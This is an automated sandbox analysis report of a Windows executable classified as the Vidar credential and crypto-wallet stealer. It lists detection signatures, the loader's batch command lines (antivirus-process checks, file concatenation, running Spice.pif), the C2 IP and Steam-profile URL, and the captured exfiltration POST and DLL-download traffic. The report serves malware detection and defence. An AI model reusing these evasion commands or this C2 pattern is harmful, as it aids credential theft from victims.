Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0dN59ZIkEM.exe

Overview

General Information

Sample name:0dN59ZIkEM.exe
renamed because original name is a hash value
Original sample name:1a6e4128750535604181321ce27c3084.exe
Analysis ID:1433839
MD5:1a6e4128750535604181321ce27c3084
SHA1:7a25a0495ac4d8718dea8baa99b671e6422e39b5
SHA256:c418f6d5142f3f9c830a5750014cc233a12775f5d252ed02a62f45415dd6dd32
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 0dN59ZIkEM.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\0dN59ZIkEM.exe" MD5: 1A6E4128750535604181321CE27C3084)
    • cmd.exe (PID: 6452 cmdline: "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3804 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6764 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5612 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6776 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5760 cmdline: cmd /c md 1151 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 3016 cmdline: findstr /V "NickelTruckWritersBattery" Mattress MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1988 cmdline: cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Spice.pif (PID: 752 cmdline: 1151\Spice.pif 1151\a MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
      • PING.EXE (PID: 4868 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              11.2.Spice.pif.4810000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 1151\Spice.pif 1151\a, CommandLine: 1151\Spice.pif 1151\a, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: 1151\Spice.pif 1151\a, ProcessId: 752, ProcessName: Spice.pif

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6776, ProcessName: findstr.exe
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}
                Source: https://37.27.87.155/sqln.dllVirustotal: Detection: 11%Perma Link
                Source: https://37.27.87.155/Virustotal: Detection: 10%Perma Link
                Source: https://37.27.87.155Virustotal: Detection: 10%Perma Link
                Source: 0dN59ZIkEM.exeReversingLabs: Detection: 47%
                Source: 0dN59ZIkEM.exeVirustotal: Detection: 41%Perma Link
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifJoe Sandbox ML: detected
                Source: 0dN59ZIkEM.exeJoe Sandbox ML: detected

                Compliance

                barindex
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifUnpacked PE file: 11.2.Spice.pif.10000000.2.unpack
                Source: 0dN59ZIkEM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.7.115.52:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: 0dN59ZIkEM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                Source: Binary string: mozglue.pdbP source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                Source: Binary string: nss3.pdb@ source: nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
                Source: Binary string: nss3.pdb source: nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr
                Source: Binary string: mozglue.pdb source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
                Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00ED4005
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00ED494A
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00EDC2FF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00EDCD9F
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDCD14 FindFirstFileW,FindClose,11_2_00EDCD14
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00EDF5D8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00EDF735
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00EDFA36
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00ED3CE2
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior

                Networking

                barindex
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199677575543
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 37.27.87.155 37.27.87.155
                Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 6937Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 61029Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDHCBGDHJKEBGDGIJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 7005Connection: Keep-AliveCache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EE29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_00EE29BA
                Source: global trafficHTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVB
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: 0dN59ZIkEM.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
